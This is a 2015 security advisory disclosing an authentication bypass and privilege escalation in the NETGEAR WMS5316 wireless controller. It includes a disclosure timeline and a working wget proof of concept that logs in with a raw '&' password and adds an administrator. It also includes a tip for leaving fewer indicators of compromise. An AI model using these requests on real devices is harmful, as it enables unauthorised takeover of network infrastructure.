NETGEAR WMS Authentication Bypass / Privilege Escalation

Posted Sep 7, 2015
Authored by Elliott Lewis

NETGEAR WMS5316 ProSafe 16AP Wireless Management System suffers from authentication bypass and privilege escalation vulnerabilities.

tags | exploit, vulnerability, bypass
SHA-256 | 86cc59ece6d7740256a5f0acbd7fe46d2604e8275a7d58e19671e76ed8abe30c

NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation.
WMS5316 ProSafe 16AP Wireless Management System - Firmware 2.1.4.15
(Build 1236).


[-] Vulnerability Information:
==============================
Title: NETGEAR Wireless Management System - Authentication Bypass and
Privilege Escalation
CVE: Not assigned
Vendor: NETGEAR
Product: WMS5316 ProSafe 16AP Wireless Management System
Affected Version: Firmware 2.1.4.15 (Build 1236)
Fixed Version: Not publicly available


[-] Disclosure Timeline:
========================
22/04/2015
Vulnerability identified by Reinforce Services

23/04/2015
Support case created with NETGEAR.

24/04/2015
Vendor requested further information.

27/04/2015
Issue escalated within NETGEAR.

30/04/2015
Issue confirmed by vendor.

18/05/2015
Vendor confirmed issue present in other controllers (details unknown).
Beta update for WMS5316 expected first week of June.

25/06/2015
Vendor releases firmware version 2.1.5 that now contains a fix.
http://downloadcenter.netgear.com/en/product/WMS5316#
http://kb.netgear.com/app/answers/detail/a_id/29339
(Note: This has not been tested to confirm the issue is resolved)


[-] Proof of Concept:
=====================
# Step 1 (first wget): log in with a raw, unencoded "&" as the password and
# save the session cookie. Step 2 (second wget): reuse that cookie to add an
# administrative user ("type": "2"). 192.168.1.2 is the controller's address.
wget --keep-session-cookies --save-cookies=cookies.txt \
  --post-data="reqMethod=auth_user&jsonData=%7B%22user_name%22%3A%20%22ANYTHING%22%2C%20%22password%22%3A%20%22&%22%7D" \
  http://192.168.1.2/login_handler.php && \
wget --load-cookies=cookies.txt \
  --post-data="reqMethod=add_user&jsonData=%7B%22user_name%22%3A%20%22newusername%22%2C%20%22password%22%3A%20%22newpassword%22%2C%20%22re_password%22%3A%20%22newpassword%22%2C%20%22type%22%3A%20%222%22%7D" \
  http://192.168.1.2/request_handler.php


[-] Vulnerability Details:
==========================
The process to bypass authentication and escalate privileges is as follows:

One:
Include the "&" symbol anywhere in the password value in the login
request, as raw content (it must not be percent-encoded). Because the
body is form-urlencoded, a raw "&" terminates the jsonData parameter
early, so the server receives a truncated JSON document instead of the
intended credentials; the advisory does not describe how the server
handles this, only that access is granted.

Two:
After a moment, the system accepts those credentials and grants
access to the GUI. The account appears somewhat restricted, but that
restriction is enforced only on the client side.

Three:
Send a request to add a new administrative user.

Four:
The new admin account is then available for use as created above.

Note: As an alternative, it is trivial to modify the client-side
JavaScript on its way down to the browser to enable all of the admin
functions rather than creating a new user. This worked as well, so it
is not strictly necessary to create a new user; the bypass 'user'
already has full admin access if needed (leaving fewer indicators of
compromise than a newly created account would).


[-] Credits:
============
Vulnerability discovered by Elliott Lewis of Reinforce Services


[-] Copyright:
==============
Copyright (c) Reinforce Services Limited 2015, All rights reserved
worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered
in any way without the express written consent of Reinforce Services
Limited.


[-] Disclaimer:
===============
The information herein contained may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this
information or its use. Any use of this information is at the user's
risk. In no event shall the author/distributor (Reinforce Services
Limited) be held liable for any damages whatsoever arising out of or
in connection with the use or spread of this information.